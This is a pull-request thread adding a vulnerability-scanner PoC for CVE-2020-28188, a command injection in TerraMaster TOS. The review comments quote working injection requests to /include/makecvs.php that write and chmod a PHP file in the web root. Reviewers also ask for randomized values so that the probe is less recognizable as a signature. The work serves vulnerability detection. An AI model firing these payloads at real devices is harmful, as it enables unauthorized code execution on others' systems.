Terramastertos cve 2020 28188.yml
chaitin/xray pull request #975
Opened 2020-12-31 11:18 UTC by D4ch1au

## 本 poc 是检测什么漏洞的
TerraMaster TOS 4.2.06版本及之前版本存在操作系统命令注入漏洞。
## 测试环境
私聊
## 备注

2021-01-07 07:06 UTC, zema1 requested changes

2021-01-07 07:06 UTC, zema1 commented on pocs/terramastertos-cve-2020-28188-rce.yml
> +      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
poc 如无必要不要带 ua

2021-01-07 07:06 UTC, zema1 commented on pocs/terramastertos-cve-2020-28188-rce.yml
> +    path: /include/makecvs.php?Event=http|echo%20"<?php%20echo%20md5(1)?>"%20>>%20/usr/www/testtest.php%20&&%20chmod%20755%20/usr/www/testtest.php||
这里建议用 printf 同时自删除，可以参考这个改下 https://docs.xray.cool/#/guide/high_quality_poc?id=%e5%ba%94%e8%af%a5%e6%80%8e%e4%b9%88%e5%81%9a

2021-01-07 07:06 UTC, zema1 commented on pocs/terramastertos-cve-2020-28188-rce.yml
> +    path: /include/makecvs.php?Event=http%7Crm%20/usr/www/testtest.php%7C%7C
上一个 rule 已经可以确认这个漏洞存在了，这里的这条规则是想确认什么呢，如无必要，可以去掉。

2021-01-07 09:41 UTC, D4ch1au commented on pocs/terramastertos-cve-2020-28188-rce.yml
> +    path: /include/makecvs.php?Event=http%7Crm%20/usr/www/testtest.php%7C%7C
我也忘了这里是干什么的了，已经删了。

2021-01-07 09:42 UTC, D4ch1au commented on pocs/terramastertos-cve-2020-28188-rce.yml
> +    path: /include/makecvs.php?Event=http|echo%20"<?php%20echo%20md5(1)?>"%20>>%20/usr/www/testtest.php%20&&%20chmod%20755%20/usr/www/testtest.php||
ua和自删除已改。

2021-01-09 11:05 UTC, virusdefender requested changes

2021-01-09 11:05 UTC, virusdefender commented on pocs/terramastertos-cve-2020-28188-rce.yml
> +    path: /include/makecvs.php?Event=http|echo%20"<?php%20echo%20md5(1);unlink(__FILE__);?>"%20>>%20/usr/www/testtest.php%20&&%20chmod%20755%20/usr/www/testtest.php||
md5 的数字和 testtest.php 的文件名可以随机一下么，感觉容易被当成特征

2021-01-09 16:47 UTC, D4ch1au commented on pocs/terramastertos-cve-2020-28188-rce.yml
> +    path: /include/makecvs.php?Event=http|echo%20"<?php%20echo%20md5(1);unlink(__FILE__);?>"%20>>%20/usr/www/testtest.php%20&&%20chmod%20755%20/usr/www/testtest.php||
好的师傅，再看看这样行不行

2021-01-14 10:12 UTC, zema1 commented
很强 感谢大佬~

2021-01-14 10:12 UTC, merged